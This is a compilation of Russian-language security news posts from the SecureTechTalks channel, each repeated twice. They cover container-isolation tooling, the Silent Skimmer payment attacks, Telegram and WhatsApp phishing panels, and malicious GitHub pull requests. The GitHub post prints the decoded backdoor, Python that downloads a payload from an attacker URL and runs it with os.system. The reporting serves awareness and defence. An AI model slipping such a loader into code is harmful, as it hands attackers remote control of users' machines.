🛡В полной изоляции: бенчмарк для оценки защищенности контейнеров
"Am I Isolated" — инструмент с открытым исходным кодом для оценки безопасности контейнеров. Инструмент разработан на базе Rust. Он запускается внутри контейнера, анализирует возможные уязвимости и предлагет рекомендации для повышения уровня безопасности.
🛡 Возможности Am I Isolated:
- Проверка изоляции контейнеров для снижения рисков «утечек».
- Обнаружение скрытых привилегий и типичных ошибок конфигурации DevOps.
- Непрерывное тестирование для защиты от актуальных техник выхода из контейнера.
🤖 Изоляция контейнеров – основа безопасности, особенно в условиях многопользовательских облачных сред, где критична защита от несанкционированного доступа к соседним процессам.
📈 Будущее и планы:
Am I Isolated планирует добавление весовых оценок рисков и улучшение визуализации для более понятного представления данных.
🔗 С подробностями можно ознакомиться и загрузить инструмент на GitHub.
Stay secure and read SecureTechTalks 📚
#containersecurity #cloudnative #cybersecurity #SecureTechTalks
"Am I Isolated" — инструмент с открытым исходным кодом для оценки безопасности контейнеров. Инструмент разработан на базе Rust. Он запускается внутри контейнера, анализирует возможные уязвимости и предлагет рекомендации для повышения уровня безопасности.
🛡 Возможности Am I Isolated:
- Проверка изоляции контейнеров для снижения рисков «утечек».
- Обнаружение скрытых привилегий и типичных ошибок конфигурации DevOps.
- Непрерывное тестирование для защиты от актуальных техник выхода из контейнера.
🤖 Изоляция контейнеров – основа безопасности, особенно в условиях многопользовательских облачных сред, где критична защита от несанкционированного доступа к соседним процессам.
📈 Будущее и планы:
Am I Isolated планирует добавление весовых оценок рисков и улучшение визуализации для более понятного представления данных.
🔗 С подробностями можно ознакомиться и загрузить инструмент на GitHub.
Stay secure and read SecureTechTalks 📚
#containersecurity #cloudnative #cybersecurity #SecureTechTalks
🌏 GeogGNN: Новый Подход к Прогнозированию Киберпреступлений с учетом Географических Данных
Исследователи из Объединённых Арабских Эмиратов и Иордании представили уникальный метод прогнозирования киберпреступлений с помощью Географически Взвешенных Графовых Нейронных Сетей (GeogGNN). Новая модель объединяет пространственные координаты инцидентов, что позволяет учитывать географические зависимости и улучшать точность классификации киберугроз.
🌐 Модель GeogGNN — это прорыв в анализе угроз, поскольку традиционные нейронные сети не учитывают пространственные аспекты, и GeogGNN восполняет этот пробел.
🔍 Прогнозирование кибератак становится точнее: правоохранительные органы смогут определять потенциальные «горячие точки» для кибератак, эффективно распределять ресурсы и заранее принимать меры для повышения уровня безопасности.
💡 GeogGNN учитывает, что кибератаки имеют определённые закономерности распространения, которые можно проанализировать с учётом географических факторов. Модель способна предсказать, какие регионы могут стать уязвимыми и адаптировать меры противодействия угрозам.
🌍 Данный метод может стать основой для создания более точных систем мониторинга и анализа кибератак на глобальном уровне, что особенно важно в условиях растущей глобализации киберугроз.
🔗 Подробнее о GeogGNN можно прочитать в научной статье
Stay secure and read SecureTechTalks 📚
#CyberSecurity #AI #NeuralNetworks #CyberThreats #SecureTechTalks #GeogGNN #Кибербезопасность #Прогнозирование
Исследователи из Объединённых Арабских Эмиратов и Иордании представили уникальный метод прогнозирования киберпреступлений с помощью Географически Взвешенных Графовых Нейронных Сетей (GeogGNN). Новая модель объединяет пространственные координаты инцидентов, что позволяет учитывать географические зависимости и улучшать точность классификации киберугроз.
🌐 Модель GeogGNN — это прорыв в анализе угроз, поскольку традиционные нейронные сети не учитывают пространственные аспекты, и GeogGNN восполняет этот пробел.
🔍 Прогнозирование кибератак становится точнее: правоохранительные органы смогут определять потенциальные «горячие точки» для кибератак, эффективно распределять ресурсы и заранее принимать меры для повышения уровня безопасности.
💡 GeogGNN учитывает, что кибератаки имеют определённые закономерности распространения, которые можно проанализировать с учётом географических факторов. Модель способна предсказать, какие регионы могут стать уязвимыми и адаптировать меры противодействия угрозам.
🌍 Данный метод может стать основой для создания более точных систем мониторинга и анализа кибератак на глобальном уровне, что особенно важно в условиях растущей глобализации киберугроз.
🔗 Подробнее о GeogGNN можно прочитать в научной статье
Stay secure and read SecureTechTalks 📚
#CyberSecurity #AI #NeuralNetworks #CyberThreats #SecureTechTalks #GeogGNN #Кибербезопасность #Прогнозирование
👻 Silent Skimmer: Возвращение атак на платёжные системы
💥 Исследователи из Unit 42 зафиксировали новую активность группы Silent Skimmer, известной по атакам на платёжные сервисы в 2023 году. В мае 2024 года злоумышленники использовали уязвимости веб-серверов крупной компании в Северной Америке, применив технологии обхода защит.
🛠 Хакеры использовали уязвимости CVE-2017-11317 и CVE-2019-18935 для доступа к системе, устанавливая обратные прокси и веб-оболочки. Благодаря этим инструментам, они обеспечили постоянное подключение к сети компании и внедрили PowerShell-скрипты для повышения привилегий.
🔍 Для защиты от обнаружения хакеры использовали смешанные сборки на .NET и C++. Они применяли Python-скрипты для эксфильтрации данных, упаковывая их с помощью PyInstaller, что позволяло скрыть вредоносный функционал под видом легитимных файлов.
⚠️ Киберпреступники использовали «mshta.exe» для запуска HTA-файлов с вредоносными командами, задействовав PowerShell для выполнения скрытых действий и подключения к базам данных.
👥 Эксперты кибербезопасности рекомендуют незамедлительное обновление уязвимых программ и внедрение продвинутых защитных решений, таких как Cortex XDR, Advanced URL Filtering и Advanced DNS Security.
Stay secure and read SecureTechTalks 📚
#CyberSecurity #SilentSkimmer #ThreatIntelligence #SecureTechTalks #ПлатежныеСистемы #Киберугрозы
💥 Исследователи из Unit 42 зафиксировали новую активность группы Silent Skimmer, известной по атакам на платёжные сервисы в 2023 году. В мае 2024 года злоумышленники использовали уязвимости веб-серверов крупной компании в Северной Америке, применив технологии обхода защит.
🛠 Хакеры использовали уязвимости CVE-2017-11317 и CVE-2019-18935 для доступа к системе, устанавливая обратные прокси и веб-оболочки. Благодаря этим инструментам, они обеспечили постоянное подключение к сети компании и внедрили PowerShell-скрипты для повышения привилегий.
🔍 Для защиты от обнаружения хакеры использовали смешанные сборки на .NET и C++. Они применяли Python-скрипты для эксфильтрации данных, упаковывая их с помощью PyInstaller, что позволяло скрыть вредоносный функционал под видом легитимных файлов.
⚠️ Киберпреступники использовали «mshta.exe» для запуска HTA-файлов с вредоносными командами, задействовав PowerShell для выполнения скрытых действий и подключения к базам данных.
👥 Эксперты кибербезопасности рекомендуют незамедлительное обновление уязвимых программ и внедрение продвинутых защитных решений, таких как Cortex XDR, Advanced URL Filtering и Advanced DNS Security.
Stay secure and read SecureTechTalks 📚
#CyberSecurity #SilentSkimmer #ThreatIntelligence #SecureTechTalks #ПлатежныеСистемы #Киберугрозы
🚪 Прозрачность и защита ИИ: Важность открытого обмена информацией о уязвимостях
💡 Сегодня защита ИИ требует более ответственного подхода и открытого обмена информацией о его уязвимостях. Фил Венейблс из Google Cloud подчёркивает, что выявление и раскрытие уязвимостей усиливают защиту, уменьшая риски атак и помогая всему сектору. Google использует собственную команду AI Red Team и разработала Secure AI Framework (SAIF) для повышения безопасности ИИ.
🔍 Роль исследования уязвимостей
Атаки на ИИ становятся всё сложнее, и потому своевременные исследования критически важны. Google Cloud Vulnerability Research (CVR) недавно нашла уязвимости в Vertex AI и поделилась ими с другими платформами, чтобы предотвратить повторение подобных проблем.
🤝 Культура безопасности
Открытое обсуждение и обнародование проблем безопасности – не слабость, а знак зрелости и приверженности к улучшению технологий. Прозрачность помогает всем заинтересованным сторонам, создавая надёжные стандарты безопасности в AI-индустрии.
🔗 Совместные инициативы: SAIF и коалиции
Google разрабатывает SAIF и объединяет усилия с другими, чтобы установить единые стандарты безопасности для ИИ. Это поможет защитить экосистему и снизить риски утечек данных.
📈 Прогнозы и стандарты безопасности
Google нацелены на стандартизацию безопасности ИИ, чтобы обеспечить пользователям надёжную защиту. Работа над безопасностью ИИ как отраслевым стандартом поможет в создании доверия и раскрытии потенциала ИИ.
📉 Уход Лилиан Венг из OpenAI
В то время как Google усиливает позиции в безопасности, OpenAI столкнулся с рядом увольнений. Лилиан Венг, глава исследований безопасности, решила покинуть компанию, что, по её словам, было непростым решением. На фоне ухода ведущих специалистов в области безопасности OpenAI сталкивается с обвинениями, что коммерция перевешивает приоритеты в защите ИИ.
Stay secure and read SecureTechTalks 📚
#AIsecurity #VulnerabilityResearch #GoogleAI #CyberSecurity #SecureTechTalks #ИИ
💡 Сегодня защита ИИ требует более ответственного подхода и открытого обмена информацией о его уязвимостях. Фил Венейблс из Google Cloud подчёркивает, что выявление и раскрытие уязвимостей усиливают защиту, уменьшая риски атак и помогая всему сектору. Google использует собственную команду AI Red Team и разработала Secure AI Framework (SAIF) для повышения безопасности ИИ.
🔍 Роль исследования уязвимостей
Атаки на ИИ становятся всё сложнее, и потому своевременные исследования критически важны. Google Cloud Vulnerability Research (CVR) недавно нашла уязвимости в Vertex AI и поделилась ими с другими платформами, чтобы предотвратить повторение подобных проблем.
🤝 Культура безопасности
Открытое обсуждение и обнародование проблем безопасности – не слабость, а знак зрелости и приверженности к улучшению технологий. Прозрачность помогает всем заинтересованным сторонам, создавая надёжные стандарты безопасности в AI-индустрии.
🔗 Совместные инициативы: SAIF и коалиции
Google разрабатывает SAIF и объединяет усилия с другими, чтобы установить единые стандарты безопасности для ИИ. Это поможет защитить экосистему и снизить риски утечек данных.
📈 Прогнозы и стандарты безопасности
Google нацелены на стандартизацию безопасности ИИ, чтобы обеспечить пользователям надёжную защиту. Работа над безопасностью ИИ как отраслевым стандартом поможет в создании доверия и раскрытии потенциала ИИ.
📉 Уход Лилиан Венг из OpenAI
В то время как Google усиливает позиции в безопасности, OpenAI столкнулся с рядом увольнений. Лилиан Венг, глава исследований безопасности, решила покинуть компанию, что, по её словам, было непростым решением. На фоне ухода ведущих специалистов в области безопасности OpenAI сталкивается с обвинениями, что коммерция перевешивает приоритеты в защите ИИ.
Stay secure and read SecureTechTalks 📚
#AIsecurity #VulnerabilityResearch #GoogleAI #CyberSecurity #SecureTechTalks #ИИ
🖥 Powerpipe: Open-source инструменты для визуализации и мониторинга DevOps
💡 Powerpipe – open-source решение, созданное для упрощения управления DevOps-процессами. Продукт предоставляет набор инструментов визуализации и мониторинга соответствия заданным стандартам.
🔍 Динамические дашборды и отчёты
Powerpipe позволяет создавать кастомизируемые дашборды с ключевыми показателями, маркируя неправильные настройки и критические точки. С помощью фильтров, кубов данных и создания снепшотов состояния системы можно оперативно управлять состоянием инфраструктуры.
📏 Индустриальные стандарты
Платформа предоставляет доступ к более чем 5000 open-source настройкам, соответствующих стандартам CIS, NIST, PCI, HIPAA и FedRAMP. Проверки можно запускать локально или интегрировать в конвейер развёртывания, чтобы обеспечить соответствие требованиям безопасности.
🕸️ Диаграммы связей
Powerpipe создан для визуализации связей и зависимостей между данными в вашей облачной среде. Исследуйте инфраструктуру в деталях, чтобы получить ясную картину имеющихся ресурсов и взаимосвязей.
💻 Подход «Code-first»
Powerpipe ориентирован на DevOps-команды, предлагая управление через код вместо кликов. Дашборды версионируемые, модульные и легко интегрируемые в рабочие процессы, обеспечивая максимальную гибкость и точность.
🛠️ Готовые модули
Powerpipe предоставляет преднастроенные модули (mods), которые поддерживают AWS, Azure, GCP, Kubernetes, Terraform, GitHub, M365 и другие популярные платформы. Среди доступных кейсов — безопасность и соответствие требованиям, управление затратами, анализ активов и их инвентаризация.
Большинство модулей написано для работы с экосистемой плагинов Steampipe, однако Powerpipe поддерживает и другие источники данных, такие как Postgres, SQLite, DuckDB и MySQL.
Powerpipe доступен бесплатно на GitHub.
Stay secure and read SecureTechTalks 📚
#DevOps #CyberSecurity #Powerpipe #OpenSource #SecureTechTalks
💡 Powerpipe – open-source решение, созданное для упрощения управления DevOps-процессами. Продукт предоставляет набор инструментов визуализации и мониторинга соответствия заданным стандартам.
🔍 Динамические дашборды и отчёты
Powerpipe позволяет создавать кастомизируемые дашборды с ключевыми показателями, маркируя неправильные настройки и критические точки. С помощью фильтров, кубов данных и создания снепшотов состояния системы можно оперативно управлять состоянием инфраструктуры.
📏 Индустриальные стандарты
Платформа предоставляет доступ к более чем 5000 open-source настройкам, соответствующих стандартам CIS, NIST, PCI, HIPAA и FedRAMP. Проверки можно запускать локально или интегрировать в конвейер развёртывания, чтобы обеспечить соответствие требованиям безопасности.
🕸️ Диаграммы связей
Powerpipe создан для визуализации связей и зависимостей между данными в вашей облачной среде. Исследуйте инфраструктуру в деталях, чтобы получить ясную картину имеющихся ресурсов и взаимосвязей.
💻 Подход «Code-first»
Powerpipe ориентирован на DevOps-команды, предлагая управление через код вместо кликов. Дашборды версионируемые, модульные и легко интегрируемые в рабочие процессы, обеспечивая максимальную гибкость и точность.
🛠️ Готовые модули
Powerpipe предоставляет преднастроенные модули (mods), которые поддерживают AWS, Azure, GCP, Kubernetes, Terraform, GitHub, M365 и другие популярные платформы. Среди доступных кейсов — безопасность и соответствие требованиям, управление затратами, анализ активов и их инвентаризация.
Большинство модулей написано для работы с экосистемой плагинов Steampipe, однако Powerpipe поддерживает и другие источники данных, такие как Postgres, SQLite, DuckDB и MySQL.
Powerpipe доступен бесплатно на GitHub.
Stay secure and read SecureTechTalks 📚
#DevOps #CyberSecurity #Powerpipe #OpenSource #SecureTechTalks
🎣 Анализ фишинговых панелей для кражи аккаунтов Telegram и WhatsApp
💡 Эксперты компании F.A.C.C.T. провели исследование веб-панелей, которые злоумышленники используют для создания фишинговых сайтов. Эти ресурсы предназначены для обмана пользователей и захвата их учетных записей в мессенджерах Telegram и WhatsApp.
🔎 Как работают фишинговые сайты?
На таких сайтах пользователям предлагают «бесплатный Telegram Premium», возможность «пробить» данные других пользователей или «накрутить лайки». Подобные обещания привлекают невнимательных людей, которые в итоге лишаются своих аккаунтов.
📊 Количество фишинговых ресурсов растёт
Эксперты выявили шесть панелей для Telegram и одну для WhatsApp, которые позволяют создавать такие сайты. Одна из панелей за первые шесть месяцев 2024 года помогла создать более 900 фишинговых ресурсов. Основные приманки включают бесплатные подписки, участие в голосованиях и доступ к приватным каналам.
💸 Масштаб проблемы
Украденные данные продаются на подпольных маркетплейсах. Доходы опытных злоумышленников составляют от 600 000 до 2,5 млн рублей в месяц.
🔧 Популярные панели и их возможности
- Social Engineering: позволяет создавать фальшивые сайты с кастомными шаблонами. Пользователи панели управляют страницами, отслеживают статистику и рейтинг украденных сессий.
- Teletron: предлагает до 10 шаблонов, включая «Telegram Premium» и денежные призы. Злоумышленники могут привязывать домены и выставлять украденные аккаунты на продажу.
- Wphisher (для WhatsApp): предоставляет шаблоны для сайтов с QR-кодами и фейковыми голосованиями. Сессии сохраняются в виде Chrome-профилей, что позволяет захватывать учетные записи и отправлять от их имени мошеннические сообщения.
📢 Методы привлечения жертв
Основной способ — это реклама в соцсетях. Пользователям предлагают перейти по ссылкам на ресурсы, якобы предоставляющие бесплатные услуги или уникальные возможности.
🛡️ Как защититься?
- Включайте двухфакторную аутентификацию.
- Проверяйте ссылки перед переходом.
- Никогда не вводите коды подтверждения из сообщений на подозрительных сайтах.
- При неожиданном выходе из аккаунта немедленно обращайтесь в техподдержку, завершайте сторонние сессии и меняйте пароль.
Stay secure and read SecureTechTalks 📚
#CyberSecurity #Telegram #WhatsApp #Phishing #SecureTechTalks
💡 Эксперты компании F.A.C.C.T. провели исследование веб-панелей, которые злоумышленники используют для создания фишинговых сайтов. Эти ресурсы предназначены для обмана пользователей и захвата их учетных записей в мессенджерах Telegram и WhatsApp.
🔎 Как работают фишинговые сайты?
На таких сайтах пользователям предлагают «бесплатный Telegram Premium», возможность «пробить» данные других пользователей или «накрутить лайки». Подобные обещания привлекают невнимательных людей, которые в итоге лишаются своих аккаунтов.
📊 Количество фишинговых ресурсов растёт
Эксперты выявили шесть панелей для Telegram и одну для WhatsApp, которые позволяют создавать такие сайты. Одна из панелей за первые шесть месяцев 2024 года помогла создать более 900 фишинговых ресурсов. Основные приманки включают бесплатные подписки, участие в голосованиях и доступ к приватным каналам.
💸 Масштаб проблемы
Украденные данные продаются на подпольных маркетплейсах. Доходы опытных злоумышленников составляют от 600 000 до 2,5 млн рублей в месяц.
🔧 Популярные панели и их возможности
- Social Engineering: позволяет создавать фальшивые сайты с кастомными шаблонами. Пользователи панели управляют страницами, отслеживают статистику и рейтинг украденных сессий.
- Teletron: предлагает до 10 шаблонов, включая «Telegram Premium» и денежные призы. Злоумышленники могут привязывать домены и выставлять украденные аккаунты на продажу.
- Wphisher (для WhatsApp): предоставляет шаблоны для сайтов с QR-кодами и фейковыми голосованиями. Сессии сохраняются в виде Chrome-профилей, что позволяет захватывать учетные записи и отправлять от их имени мошеннические сообщения.
📢 Методы привлечения жертв
Основной способ — это реклама в соцсетях. Пользователям предлагают перейти по ссылкам на ресурсы, якобы предоставляющие бесплатные услуги или уникальные возможности.
🛡️ Как защититься?
- Включайте двухфакторную аутентификацию.
- Проверяйте ссылки перед переходом.
- Никогда не вводите коды подтверждения из сообщений на подозрительных сайтах.
- При неожиданном выходе из аккаунта немедленно обращайтесь в техподдержку, завершайте сторонние сессии и меняйте пароль.
Stay secure and read SecureTechTalks 📚
#CyberSecurity #Telegram #WhatsApp #Phishing #SecureTechTalks
🛜 Chrome и ИИ: новые функции безопасности
🌐 Google улучшили защиту Chrome, добавив ИИ. Теперь функция «Улучшенная защита» в Chrome использует искусственный интеллект для обеспечения более надежной защиты в реальном времени. Она анализирует веб-сайты, загрузки и расширения, выявляя потенциально опасные ресурсы. Даже если Google ранее не классифицировала сайт как опасный, ИИ поможет заблокировать доступ и предупредит пользователя.
⚡ Основные улучшения:
- Глубокий анализ загрузок.
- Улучшенная работа всех связанных с Chrome сервисов Google.
- Предупреждения о неизвестных и потенциально опасных ресурсах.
💡 Новые функции управления вкладками
Google обновила работу с вкладками в Chrome Canary:
- Группировка вкладок с ИИ: теперь вкладки автоматически организуются для удобства.
- Просмотр неактивных вкладок: вместо автоматического закрытия вкладок, неактивных более семи дней, пользователи могут сначала их просмотреть.
🌍 ИИ для переводов
Google также тестирует API, использующий машинное обучение для перевода текста. Эта функция упростит перевод контента на веб-страницах и введённого текста, например в чатах или на форумах.
Stay secure and read SecureTechTalks 📚
#Chrome #CyberSecurity #AI #Google #SecureTechTalks
🌐 Google улучшили защиту Chrome, добавив ИИ. Теперь функция «Улучшенная защита» в Chrome использует искусственный интеллект для обеспечения более надежной защиты в реальном времени. Она анализирует веб-сайты, загрузки и расширения, выявляя потенциально опасные ресурсы. Даже если Google ранее не классифицировала сайт как опасный, ИИ поможет заблокировать доступ и предупредит пользователя.
⚡ Основные улучшения:
- Глубокий анализ загрузок.
- Улучшенная работа всех связанных с Chrome сервисов Google.
- Предупреждения о неизвестных и потенциально опасных ресурсах.
💡 Новые функции управления вкладками
Google обновила работу с вкладками в Chrome Canary:
- Группировка вкладок с ИИ: теперь вкладки автоматически организуются для удобства.
- Просмотр неактивных вкладок: вместо автоматического закрытия вкладок, неактивных более семи дней, пользователи могут сначала их просмотреть.
🌍 ИИ для переводов
Google также тестирует API, использующий машинное обучение для перевода текста. Эта функция упростит перевод контента на веб-страницах и введённого текста, например в чатах или на форумах.
Stay secure and read SecureTechTalks 📚
#Chrome #CyberSecurity #AI #Google #SecureTechTalks
⚔ Аппаратная безопасность под угрозой: ключевые выводы из нового отчёта NIST
🌐 Национальный институт стандартов и технологий США (NIST) опубликовал отчёт «Сценарии отказов аппаратной безопасности: потенциальные аппаратные уязвимости» (NIST IR 8517), который проливает свет на скрытые угрозы в аппаратном обеспечении. Документ рассматривает, как ошибки, заложенные на этапе проектирования чипов, могут стать причиной серьёзных рисков, которые сложно устранить после запуска продукции.
📌 В отчёте представлено 98 сценариев, иллюстрирующих, как злоумышленники могут воспользоваться уязвимостями в аппаратной архитектуре и реализации:
- Ошибки в управлении доступом.
- Нарушение стандартов кодирования.
- Проблемы жизненного цикла разработки.
Сценарии описывают, как можно обойти существующие механизмы защиты, получить доступ к конфиденциальной информации или нарушить работу систем.
🔒 Необходимость ранней интеграции мер безопасности
NIST подчёркивает, что на этапе разработки оборудования необходимо сразу внедрять меры безопасности, так как исправление аппаратных уязвимостей гораздо сложнее, чем устранение багов в программном обеспечении.
💡 Хотя как аппаратные, так и программные ошибки связаны с использованием сложного кода, аппаратные уязвимости имеют уникальную природу. Они требуют другого подхода и более глубокого анализа.
Stay secure and read SecureTechTalks 📚
#NIST #CyberSecurity #HardwareSecurity #SecureTechTalks
🌐 Национальный институт стандартов и технологий США (NIST) опубликовал отчёт «Сценарии отказов аппаратной безопасности: потенциальные аппаратные уязвимости» (NIST IR 8517), который проливает свет на скрытые угрозы в аппаратном обеспечении. Документ рассматривает, как ошибки, заложенные на этапе проектирования чипов, могут стать причиной серьёзных рисков, которые сложно устранить после запуска продукции.
📌 В отчёте представлено 98 сценариев, иллюстрирующих, как злоумышленники могут воспользоваться уязвимостями в аппаратной архитектуре и реализации:
- Ошибки в управлении доступом.
- Нарушение стандартов кодирования.
- Проблемы жизненного цикла разработки.
Сценарии описывают, как можно обойти существующие механизмы защиты, получить доступ к конфиденциальной информации или нарушить работу систем.
🔒 Необходимость ранней интеграции мер безопасности
NIST подчёркивает, что на этапе разработки оборудования необходимо сразу внедрять меры безопасности, так как исправление аппаратных уязвимостей гораздо сложнее, чем устранение багов в программном обеспечении.
💡 Хотя как аппаратные, так и программные ошибки связаны с использованием сложного кода, аппаратные уязвимости имеют уникальную природу. Они требуют другого подхода и более глубокого анализа.
Stay secure and read SecureTechTalks 📚
#NIST #CyberSecurity #HardwareSecurity #SecureTechTalks
🛡Google тестирует новую функцию для защиты электронной почты: Shielded Email
🔍 Эксперты Android Authority обнаружили в обновлении Google Play Services версии 24.45.33 фрагменты кода, намекающие на разработку функции Shielded Email.
📧 Фича предназначена для создания временных или ограниченно используемых псевдонимов электронной почты, которые перенаправляют письма на основной аккаунт. При появлении нежелательной рассылки пользователь сможет отключить переадресацию, сохранив конфиденциальность основного адреса.
🔒 Shielded Email поможет защититься от спама, минимизировать последствия утечек данных и снизить риск онлайн-отслеживания. Такой подход может стать важным инструментом для обеспечения цифровой безопасности.
🛠 Функция уже появилась в настройках автозаполнения, но на данный момент при попытке её активировать пользователь перенаправляется на пустую страницу myaccount.google.com.
Stay secure and read SecureTechTalks 📚
#cybersecurity #google #ShieldedEmail #privacy #SecureTechTalks
🔍 Эксперты Android Authority обнаружили в обновлении Google Play Services версии 24.45.33 фрагменты кода, намекающие на разработку функции Shielded Email.
📧 Фича предназначена для создания временных или ограниченно используемых псевдонимов электронной почты, которые перенаправляют письма на основной аккаунт. При появлении нежелательной рассылки пользователь сможет отключить переадресацию, сохранив конфиденциальность основного адреса.
🔒 Shielded Email поможет защититься от спама, минимизировать последствия утечек данных и снизить риск онлайн-отслеживания. Такой подход может стать важным инструментом для обеспечения цифровой безопасности.
🛠 Функция уже появилась в настройках автозаполнения, но на данный момент при попытке её активировать пользователь перенаправляется на пустую страницу myaccount.google.com.
Stay secure and read SecureTechTalks 📚
#cybersecurity #google #ShieldedEmail #privacy #SecureTechTalks
🧑🏫 Учим школьников криптографии: инструмент CryptoEL для увлекательного и практического обучения
📚 В современном мире, где цифровая безопасность становится важнее с каждым днём, криптография остаётся сложной, но необходимой темой. Специалисты из Университета Массачусетса Лоуэлла разработали CryptoEL, инновационный инструмент, который делает обучение криптографии увлекательным и доступным для школьников.
Что такое CryptoEL?
CryptoEL основан на модели обучения через опыт (Experiential Learning) и включает четыре этапа:
1. Конкретный опыт — учащиеся погружаются в сценарии из реальной жизни, наблюдая за передачей данных в идеальных и уязвимых условиях.
2. Рефлексивное наблюдение — анализ происходящего через беседы с AI-ассистентом CryptoCoach.
3. Абстрактная концептуализация — изучение концепций криптографии через интерактивные видеоматериалы и симуляции.
4. Активный эксперимент — выполнение практических заданий с использованием встроенного терминала Python.
Такой подход позволяет школьникам не только понять теорию, но и применить знания на практике, решая реальные задачи в области безопасности данных.
Основные модули CryptoEL
1. Хеширование 🔐 В модуле демонстрируется, как защита данных помогает сохранять их целостность. Ученики видят, как атаки могут изменить сообщения, и изучают, как хеширование позволяет защититься от этих изменений.
2. Симметричная криптография 📤 Используя сценарий с чат-приложением, школьники узнают, как шифрование данных помогает обеспечить конфиденциальность. Они учатся генерировать ключи, шифровать сообщения и предотвращать атаки.
3. Асимметричная криптография 🛡️ Здесь учащиеся работают с ключами для шифрования и дешифрования, что помогает им понять, как функционируют системы с публичными и приватными ключами, используемые в современных протоколах безопасности.
🔎 Опросы показали, что лишь 5% старшеклассников и менее 1% учеников средней школы изучают криптографию. CryptoEL восполняет этот пробел, делая сложные концепции доступными через визуализации, интерактивные задания и AI-помощь.
Результаты тестирования
🧪 Исследование с участием 51 школьника показало:
- 93% участников сочли инструмент полезным и увлекательным.
- Уровень понимания криптографических концепций после обучения вырос на 85–95%.
- Школьники отметили, что интерактивные симуляции и визуализации помогают легче усваивать материал.
Stay secure and read SecureTechTalks 📚
#CryptoEL #Кибербезопасность #Образование #Шифрование
📚 В современном мире, где цифровая безопасность становится важнее с каждым днём, криптография остаётся сложной, но необходимой темой. Специалисты из Университета Массачусетса Лоуэлла разработали CryptoEL, инновационный инструмент, который делает обучение криптографии увлекательным и доступным для школьников.
Что такое CryptoEL?
CryptoEL основан на модели обучения через опыт (Experiential Learning) и включает четыре этапа:
1. Конкретный опыт — учащиеся погружаются в сценарии из реальной жизни, наблюдая за передачей данных в идеальных и уязвимых условиях.
2. Рефлексивное наблюдение — анализ происходящего через беседы с AI-ассистентом CryptoCoach.
3. Абстрактная концептуализация — изучение концепций криптографии через интерактивные видеоматериалы и симуляции.
4. Активный эксперимент — выполнение практических заданий с использованием встроенного терминала Python.
Такой подход позволяет школьникам не только понять теорию, но и применить знания на практике, решая реальные задачи в области безопасности данных.
Основные модули CryptoEL
1. Хеширование 🔐 В модуле демонстрируется, как защита данных помогает сохранять их целостность. Ученики видят, как атаки могут изменить сообщения, и изучают, как хеширование позволяет защититься от этих изменений.
2. Симметричная криптография 📤 Используя сценарий с чат-приложением, школьники узнают, как шифрование данных помогает обеспечить конфиденциальность. Они учатся генерировать ключи, шифровать сообщения и предотвращать атаки.
3. Асимметричная криптография 🛡️ Здесь учащиеся работают с ключами для шифрования и дешифрования, что помогает им понять, как функционируют системы с публичными и приватными ключами, используемые в современных протоколах безопасности.
🔎 Опросы показали, что лишь 5% старшеклассников и менее 1% учеников средней школы изучают криптографию. CryptoEL восполняет этот пробел, делая сложные концепции доступными через визуализации, интерактивные задания и AI-помощь.
Результаты тестирования
🧪 Исследование с участием 51 школьника показало:
- 93% участников сочли инструмент полезным и увлекательным.
- Уровень понимания криптографических концепций после обучения вырос на 85–95%.
- Школьники отметили, что интерактивные симуляции и визуализации помогают легче усваивать материал.
Stay secure and read SecureTechTalks 📚
#CryptoEL #Кибербезопасность #Образование #Шифрование
⚠️ GitHub атакован: вредоносные коммиты с бэкдорами
👾 Проекты на GitHub подверглись серии атак с использованием вредоносных коммитов и пул-реквестов, цель которых — внедрение бэкдоров в открытые репозитории.
🚨 Первой жертвой стал стартап Exo Labs, занимающийся искусственным интеллектом и машинным обучением. Соучредитель компании, Алекс Чима, обнаружил подозрительное изменение в репозитории EXO. Оно включало невинно выглядящий пул-реквест под названием «уточнение требования mlx для моделей deepseek», пытавшийся модифицировать файл models.py, добавляя в код последовательность Unicode-чисел.
🧩 Механика
🔢 Последовательность Unicode-чисел, например 105, 109, 112, 111, 114, 116..., преобразуется в Python-код:
💡 Код устанавливает связь с указанным URL и пытается загрузить вредоносное ПО. Если бы изменение было объединено с репозиторием, злоумышленники могли бы получить удалённый доступ через внедрённый бэкдор.
🔍 Расследование атак
👤 Коммит был отправлен с учётной записи GitHub evildojo666, которая вскоре была удалена. Архивная страница указывала на Майка Белла, исследователя безопасности, однако он заявил, что не имеет отношения к атакам. Злоумышленники, вероятно, использовали его имя и фото профиля.
🔗 Аналогичные попытки атак обнаружены от учётной записи darkimage666. Malcoreio, платформа анализа вредоносных программ, зафиксировала 18 идентичных запросов на другие проекты. Под ударом оказался популярный загрузчик видео и аудио с открытым исходным кодом yt-dlp.
🛡️ Рекомендации для защиты
1. Автоматизированные проверки: Используйте инструменты для анализа безопасности, такие как AI Reviewer Presubmit, для мгновенной проверки коммитов.
2. Ручная проверка: Внимательно анализируйте пул-реквесты, особенно от неизвестных пользователей.
3. Защита репозиториев: Ограничьте доступ для коммитов и настройте уведомления об изменениях в репозиториях.
🔗 Этот инцидент напомнил о ранее известных атаках на цепочку поставок, таких как xz, где злоумышленники встраивали вредоносный код в популярные библиотеки с открытым исходным кодом.
Stay secure and read SecureTechTalks 📚
#GitHub #Киберугрозы #ОткрытыйКод #Безопасность
👾 Проекты на GitHub подверглись серии атак с использованием вредоносных коммитов и пул-реквестов, цель которых — внедрение бэкдоров в открытые репозитории.
🚨 Первой жертвой стал стартап Exo Labs, занимающийся искусственным интеллектом и машинным обучением. Соучредитель компании, Алекс Чима, обнаружил подозрительное изменение в репозитории EXO. Оно включало невинно выглядящий пул-реквест под названием «уточнение требования mlx для моделей deepseek», пытавшийся модифицировать файл models.py, добавляя в код последовательность Unicode-чисел.
🧩 Механика
🔢 Последовательность Unicode-чисел, например 105, 109, 112, 111, 114, 116..., преобразуется в Python-код:
import os
import urllib
import urllib.request
x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload")
y = x.read()
z = y.decode("utf8")
x.close()
os.system(z)
💡 Код устанавливает связь с указанным URL и пытается загрузить вредоносное ПО. Если бы изменение было объединено с репозиторием, злоумышленники могли бы получить удалённый доступ через внедрённый бэкдор.
🔍 Расследование атак
👤 Коммит был отправлен с учётной записи GitHub evildojo666, которая вскоре была удалена. Архивная страница указывала на Майка Белла, исследователя безопасности, однако он заявил, что не имеет отношения к атакам. Злоумышленники, вероятно, использовали его имя и фото профиля.
🔗 Аналогичные попытки атак обнаружены от учётной записи darkimage666. Malcoreio, платформа анализа вредоносных программ, зафиксировала 18 идентичных запросов на другие проекты. Под ударом оказался популярный загрузчик видео и аудио с открытым исходным кодом yt-dlp.
🛡️ Рекомендации для защиты
